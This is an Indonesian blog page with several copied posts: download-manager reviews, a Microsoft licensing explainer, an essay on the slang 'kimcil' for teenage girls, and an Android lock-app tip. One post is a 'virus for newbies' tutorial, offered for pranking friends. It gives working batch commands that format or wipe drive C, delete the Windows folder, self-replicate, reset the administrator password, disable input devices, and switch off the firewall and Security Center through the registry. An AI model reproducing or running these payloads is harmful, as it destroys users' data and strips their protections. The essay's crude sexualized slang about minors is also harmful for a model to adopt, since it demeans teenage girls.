News :
Unduh Adobe Flash player

15 Software Download Manager Terpopuler 2013


Jika Anda suka mendownload file dari internet anda memerlukan aplikasi download manager terbaik yang dapat mempercepat kecepatan download dan juga memberikan pilihan untuk dapat melanjutkan download sehingga Anda dapat mendownload file lagi pada kasus gangguan pada koneksi internet. Saya (Admin) lebih sering menggunakan Internet Download Manager (IDM) tetapi tidak tersedia secara gratis. Jadi saya sudah mengumpulkan beberapa aplikasi download manager gratis yang dapat Anda gunakan untuk mendownload file dari internet.


   1. FlashGet
FlashGet adalah aplikasi download manager terkemuka dan memiliki jumlah tertinggi pengguna di internet. Menggunakan teknik MHT (Multi-server Hyper-threading Transportasi), mendukung berbagai protokol dan memiliki fitur manajemen dokumen yang sangat baik. FlashGet adalah freeware tanpa adware atau spyware.
Download FlashGet

   2. Orbit Downloader

Orbit Downloader, pemimpin revolusi aplikasi download manager, dikhususkan untuk web generasi baru (web2.0),seperti video / music / streaming media dari Myspace, YouTube, Imeem, Pandora, Rapidshare, dan mendukung RTMP . Membuat download lebih mudah dan lebih cepat.
Download Orbit Downloader

   3. VDownloader

VDownloader adalah aplikasi yang ampuh yang dalam mencari, mendownload dan mengkonversi video dari Youtube, Google Video, Metacafe, MySpace, DailyMotion, pornotube, Yuvutu, dan banyak situs serupa lainnya, menyimpannya dalam format AVI atau format MPG. Ini juga merupakan video converter kuat.
Download VDownloader

   4. GetGo Download Manager
GetGo Download Manager adalah aplikasi FREEWARE dan Accelerator. Sangat mudah digunakan, cepat, kuat, dan benar-benar GRATIS. Hal ini dirancang untuk generasi baru dari web (2.0), GetGo mudah mendownload video / musik / file dari YouTube, Myspace, Google Video, MetaCafe, DailyMotion, iFilm / Spike dan setiap situs web dengan flash video FLV tertanam.
Download GetGo Download Manager

   5. Download Accelerator Plus (DAP)

Download Accelerator Plus (DAP) adalah dunia yang paling populer download accelerator, memberikan kecepatan download tercepat, dengan privasi, keamanan, dan kemudahan penggunaan.
Download DAP

   6. Free Download Manager
Free Download Manager mudah digunakan dan aplikasi ini gratis digunakan. Selain itu, FDM adalah 100% aman dan merupakan aplikasi open-source  yang didistribusikan di bawah lisensi GPL. FDM mempercepat download file dengan membelah diri menjadi bagian-bagian dan lalu mendownload file secara bersamaan. Sebagai hasilnya kecepatan download meningkat sampai 600%, atau bahkan lebih! FDM juga dapat melanjutkan download yang rusak atau tertunda sehingga Anda tidak perlu men-download dari awal setelah terputus.
Download Manager Free Download

   7. Download Accelerator Manager (DAM)


Download Accelerator Manager (DAM), mudah digunakan, berukuran mikro, dan bagus untuk mendownload file media, seperti video, musik, dan banyak lagi, dari situs media yang kaya dengan file. DAM membuat proses download lebih mudah dan lebih cepat.

Download DAM

   8. IE7Pro
IE7Pro adalah add-on milik Internet Explorer, yang mencakup banyak fitur dan tweak untuk membuat  IE Anda lebih ramah, lebih bermanfaat, dan lebih aman.
Download IE7Pro

   9. JDownloader

JDownloader adalah download manager gratis yang dirancang khusus untuk hosting file gratis seperti Rapidshare, Mediafire, Megaupload dan lain-lain. JDownloader memerlukan Java Runtime Environment (jre / jdk) 1.5 atau lebih tinggi.
Download JDownloader

  10. Getleft

Getleft digunakan untuk mendownload sebuah situs secara lengkap. Anda dapat memasukkan URL, dan dengan cepat Getleft akan mendownload setiap link URL di situs tersebut. Getleft mengubah semua link halaman asli menjadi link relatif, sehingga Anda dapat menjelajahi situs tersebut di komputer Anda secara offline.
Download Getleft

  11. DLExpert

DLExpert adalah perangkat lunak multi-thread dalam mendownload. Hal ini membuat  kita lebih cepat mendownload file dari internet. DLExpert ini multi-fungsi yang membuat thread download menjadi bagian-bagian yang berbeda dari file yang sama secara bersamaan. Setiap bagian akan didownload oleh satu thread, bagian yang sangat berbeda dapat didownload secara bersamaan. DLExpert mendukung HTTP dan FTP, juga HTTP dan FTP proxy. Beberapa fungsinya yaitu auto-dial, auto-hang up, mendownload terjadwal dan auto-shutdown membuatnya nyaman dan cepat untuk mendownload file.
Download DLExpert

  12. Activ Download Manager

Activ Download Manager adalah aplikasi yang paling dibutuhkan bagi mereka yang tidak sabar untuk download. Aplikasi ini dikembangkan untuk mengelola download, pause dan melanjutkan download, download antrian, atau cari untuk download.
Download Activ Download Manager

  13. LeechGet

LeechGet adalah download manager yang menggunakan interface modern Microsoft Outlook dan  terintegrasi ke dalam Internet Explorer, sehingga dapat dengan mudah memulai dan mengelola download Anda. LeechGet menyediakan banyak fitur, seperti download otomatis, melanjutkan download yang rusak, timer download, otomatis hang-up dan shutdown dan banyak lagi. Memungkinkan Anda mendownload website secara lengkap dengan semua gambar dalam waktu singkat.
Download LeechGet

  14. TrueDownloader  
TrueDownloader merupakan aplikasi open source untuk download dengan fitur-fitur yang baik seperti Pause / Resume download, download simultan, download segmented untuk percepatan. Juga mendukung  HTTP dan protokol FTP dengan sangat cepat! Anda bahkan dapat meningkatkan atau dapat menyesuaikan  kebutuhan anda karena ini open source.
Download TrueDownloader

  15. KooLoader

KooLoader adalah  software download all in one yang menjamin download anda melalui Internet , dengan  penambahan akselerator download adaptif, download segmented untuk percepatan, sebuah angka yang luar biasa download simultan dan banyak lagi. Kapan saja Anda perlu download file, menyalin URL dari file yang anda minta,  KooLoader akan melakukannya dengan baik.
Download KooLoader

semua ada di anen copas

Mengenali Lesensi OEM, OLP dan FPP Pada Microsoft


Ketika memebeli produk Microsoft (terutama Sistem Operasi Windows) kita akan dihadapkan dengan berbagai pilihan lisensi yang tersedia, yaitu OEM, OLP dan FPP. Berikut penjelasan dari ke-3 jenis lisensi tersebut.
1. Lisensi Jenis OEM (Original Equipment Manufacturer)

Lisensi ini berbentuk stiker yang biasanya ditempelkan di PC (Personal Computer), Laptop, Server dan harus dijual bersama dengan hardware. Dengan kata lain, lisensi ini terintegrasi langsung dengan jenis komputer (PC/Laptop/Server) yang digunakan. Jadi Software berlisensi OEM yang terinstall dan sudah diaktivasi, hanya boleh digunakan di komputer tersebut.
Apabila terjadi kerusakan pada hardware PC anda sehingga harus diganti dengan hardware yang lain (terutama mainboard/motherboard), maka lisensi OEM pada PC tersebut menjadi tidak berlaku lagi.



2. Lisensi Jenis OLP (Open License Program)

Harga lisensi jenis OLP sedikit lebih mahal dibandingkan jenis OEM, dengan minimum pembelian adalah sebanyak lima lisensi, dan biasanya harus dibeli dengan CD Media kit untuk instalasinya.

Berbeda dengan OEM, jenis lisensi ini tidak bergantung pada jenis komputer yang digunakan sehingga masih bisa digunakan apabila berganti komputer. Karenanya lisensi jenis ini tidak berbentuk stiker yang ditempelkan di komputer, tetapi hanya berbentuk sertifikat.

Jenis OLP cocok digunakan untuk perusahaan/organisasi yang menggunakan komputer lebih dari lima, atau menggunakan software minimal lima jenis (5 lisensi jenis OLP tidak harus untuk software sejenis, bisa gabungan seperti 1 lisensi windows, 1 lisensi office, 1 lisensi visio, dst).

3. Lisensi Jenis FPP (Full Packet Product)
Jenis lisensi FPP biasanya dijual dalam bentuk paket berupa box, isinya terdapat CD, buku manual dan lisensi yang terdapat dalam box.

Mirip dengan OEM, setiap satu pembelian akan mendapatkan satu lisensi untuk digunakan di satu komputer. Bedanya jenis FPP masih dapat digunakan walaupun berganti komputer, tapi tentu saja tetap hanya boleh di install di satu komputer saja. Dan lisensi jenis FPP ini jauh lebih mahal dari lisensi OEM.

Jadi, lisensi jenis apa yang pantas untuk dibeli? Jawabnya, ya tetap, sesuai kebutuhan. Apabila harga tidak menjadi masalah, jenis FPP lebih aman untuk digunakan karena tidak perlu beli software baru kalau terpaksa harus berganti komputer. Sebaliknya, kalau harga menjadi pertimbangan dan jarang berganti komputer, jenis OEM saja sudah cukup.
Jika dalam bisnis korporasi anda terdapat tindakan menyewakan Sistem Operasi tersebut kepada pelanggannya seperti warnet dan sejenisnya maka perlu satu syarat tambahan lagi yang disebut RRA (Rental Rights Agreement). Untuk mendapatkan RRA maka OS yang wajib digunakan pada korporasi tersebut minimum menggunakan XP Profesional, Win 7 profesional atau Win 8 Profesional. RRA merupakan lisense yang meberikan izin kepada pihak korporasi untuk menyewakan PC yang didalamnya terdapat Sistem Operasi Microsoft kepada pelanggan korporasi tersebut.



sumber : www.gecomputer.com
semua ada di anen copas

Tragedi Si KIMCIL


Istilah 'KIMCIL': Potret Cewek ABG Jaman Sekarang - Belakangan ini di Malang sampai dengan Jogja makin banyak terdengar istilah kimcil. Secara etimologis kimcil merupakan singkatan dari “kimpet cilik” atau bisa juga “kimpol cilik” (bahkan ada juga yang mengartikan sebagai kimplikan cilik). Secara terminologis kimcil diartikan sebagai cewek-cewek ABG Jaman Sekarang, lebih khususnya cewek-cewek ABG yang kemayu, centil, sok imut. Biasanya kimcil-kimcil ini haus akan pengakuan dan eksistensi, bahkan dalam lingkungan anak band (khususnya band “indie/underground”) terkadang kimcil sering dikaitkan dengan groupies.

Range umur mereka antara 15 – 18 tahun, tampil modis dengan baju-baju distro, berlagak sok aneh/freak, suka cari perhatian dengan cara bertingkah sok nakal demi pengakuan (termasuk di dalamnya : merokok, minum-minuman keras, bertingkah sok bitchy), terkadang over kemayu dan sok manja demi mencari perhatian.

Belakangan ini, di lingkungan Kampus anen, fenomena kimcil sedang mengalami euforia. Jika pada beberapa tahun ke belakang acara musik cutting edge hanya melulu didominasi kaum adam nan sangar, sekarang kita dapat dengan mudah menemukan gadis-gadis remaja nan wangi dalam berbagai acara musik cutting edge.

Sebuah fenomena yang wajar sebenarnya, meningat perkembangan lalu lintas komunikasi dan informasi yang sedemikan dahsyatnya. Sekarang ini informasi tentang hal-hal yang berada di luar mainstream semakin mudah di dapat. Subkultur dan musik cutting edge seperti HC/punk, emo, indie-pop, shoegaze, dan lain sebagainya yang dulu dianggap aneh sekarang dianggap keren. Sekarang ini bagi sebagian remaja, semakin kita berusaha terlihat aneh maka kita akan dianggap semakin keren. Justru mereka yang terlalu mengikuti tren mainstream justru akan di cap sebagai alay and that’s so uncool.

Hal seperti tersebut di ataslah yang memotivasi banyaknya remaja-remaja untuk ingin terlihat cool dengan cara mengikuti subkultur cutting edge, pencarian akan pengakuan ini mengirim mereka ke sebuah dunia baru, sebuah neverland bagi jiwa-jiwa tersesat yang melarikan diri dari tekanan dunia orang dewasa. Tekanan yang telah merenggut hak-hak bermain dan berekspresi mereka. Lihatlah bagaimana remaja sekarang ini sedari kecil sudah didesak oleh segala kewajiban akademis mereka, kebebasan bermain dan berekspresi mereka pun tergerus oleh laju pembangunan yang semakin berorientasi profit tanpa mengindahkan berapa banyak jiwa yang rusak.

Tapi sayangnya lagi, kehadiran mereka di “neverland” baru ini ternyata juga masih tak lepas dari eksploitasi orang yang lebih tua. Beberapa orang dewasa dalam neverland ini hanya memandang gadis-gadis remaja itu hanya sebagai obyek semata, kehadiran mereka hanya dianggap sebagai bunga yang menyediakan madunya untuk dihisap ramai-ramai dan akhirnya gadis-gadis remaja itu akan layu sebelum berkembang.

Kehadiran gadis-gadis remaja tersebut bukanlah hal yang salah, tingkah mereka yang terkesan ingin mencari eksistensi karena memang mereka sudah kehilangan eksistensi jiwa mereka sedari kecil, tingkah mereka yang terkesan mencari perhatian karena mereka memang jiwa mereka butuh perhatian -dan bukan payudara, pantat, atau vagina mereka. Maka dari itu menurut saya ngga usah deh terlalu lebay menanggapi kehadiran gadis-gadis remaja tersebut, toh mereka bisa aja kita anggap sebagai adik-adik atau teman-teman kecil kita. biasa wae.

Dalam beberapa kesempatan beberapa teman menilai anen begitu sinis terhadap kimcil, bahkan terkesan pembenci kimcil…ageist dan sexist. Ane tak pernah menjadi pembenci kimcil, anen hanya agak jengah melihat fenomena kimcil yang terlalu overrated ini.

Kadang memang jari ini terasa lebih jujur daripada mulut, dan inilah curahan hati pribadi saya yang terdalam tentang kimcil -tanpa ada maksud menjadi “si bener” alias P.C.


semua ada di anen copas

Pengaman Android Dengan Aplikasi Fingerprint Scanner


Bertemu lagi sobat anen, kali ini anen mau share tentang aplikasi buat HP tipe OS Android, haha.. siapa sih yang ga tau android jaman sekarang ini,, naah kali ini anen cuma mau share aplikasi yang bisa mengunci HP Android dengan aman, yaitu dengan Fingerprint Scanner adalah sebuah aplikasi pengunci layar atau lock screen yang keren untuk HP Android. Aplikasi pengunci layar ini seolah-olah menggunakan sidik jari si pengguna yang ditempelkan pada layar ponsel sebagai pengamannya.

Dengan aplikasi ini sobat anen bisa mengunci Android kesayangan sobat anen dengan aman dan nyaman, toh ini aplikasi mirip dengan fingerprint yang sebenarnya, naah terus bagaimana cara jalanin?? mudah kok, setelah aplikasi Fingerprint Scanner sudah terinstall, langsung jalankan aplikasi tersebut dan masuk pada menu setting. Masukkan kode yang anda inginkan pada menu setting tersebut. Selanjutnya aplikasi ini akan langsung berjalan dengan tanda kalau layar dalam keadaan mati. Dan pada saat layar ponsel dihidupkan, layar ponsel sudah dalam keadaan terkunci seperti di gambar.

Untuk membuka layar ponsel yang terkunci, sobat anen cukup menyentuh layar tepat pada hitungan kode yang telah kita masukkan pada menu setting aplikasi Fingerprint Scanner tadi. Setelah itu baru sentuhan dilepaskan dan layar ponsel akan terbuka.


Tapi jangan lupa, sebelum di install rename dulu dari zip menjadi apk.


good luck sobat..
semua ada di anen copas

Cara Bikin Virus Versi Newbie



Kali ini ane bikin tutor tentang bikin virus, ini juga bisa buat usilin temen2 ente gan...
ane cuman kasih tutor, sebetulnya yang dosa yang kasih tau ya.. :D

Ok laah cekidot...

virus ini di buat di notepad dan bertipe atau berextension .Bat
dan jangan lupa mengubah save as typenya menjadi All files



BASIC

invisible command/menghilangkan commandpromt

@echo off

Swap mouse/menukar nukar mouse

rundll32 user,swapmousebutton

buka URL yang diinginkan

start [url]http://www.google.com[/url]

shutdown komputer dan berisi pesan

shutdown -s -t 10 -c "UCAPKAN SELAMAT TINGGAL KEPADA KOMPUTERMU" -f

Disable/melumpuhkan mouse setelah restart

rundll32 mouse,disable

Disable/melumpuhkan keyboard setelah restart

rundll32 keyboard,disable

Freezes komputer setelah restart

rundll32 user,disableoemlayer

VIRUS WORM
yang satu ini membasminya butuh bantuan antivirus..

memperbanyak diri dalam direktori

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

me-replace/mengganti file batch yang lain

%0 >>other.bat


VIRUS TROJAN
dan yang ini juga butuh bantuan antivirus untuk menghapusnya..

mengirim daftar file kedalam direktori

dir *.*>>Filelist.txt

mengganti password administrasi

net user administrator PASSWORD HERE

membuat info IP

ipconfig >Computer-IP-address.txt







VIRUS PERUSAK 

copy ke Autorun

COPY %0 %windir%WINSTART.BAT

Format Drive C

format c: /q /autotest

Delete Windows

DELTREE /Y %windir%

Menghapus Drive C dengan Paksa

DEL /F /S /Q C:

Mematikan Firewall dan security Center

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

PAUSE

Pause sampai tekan sembarang tombol

pause

Pause 20 detik

@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

di anjurkan untuk menggunakan seperlunya saja, jika sakit berlanjut, segera gali kuburan terdekat,, :D


semua ada di anen copas
 
Unduh Adobe Flash player

Ads FOREX

Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. ANEN Copas™ - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger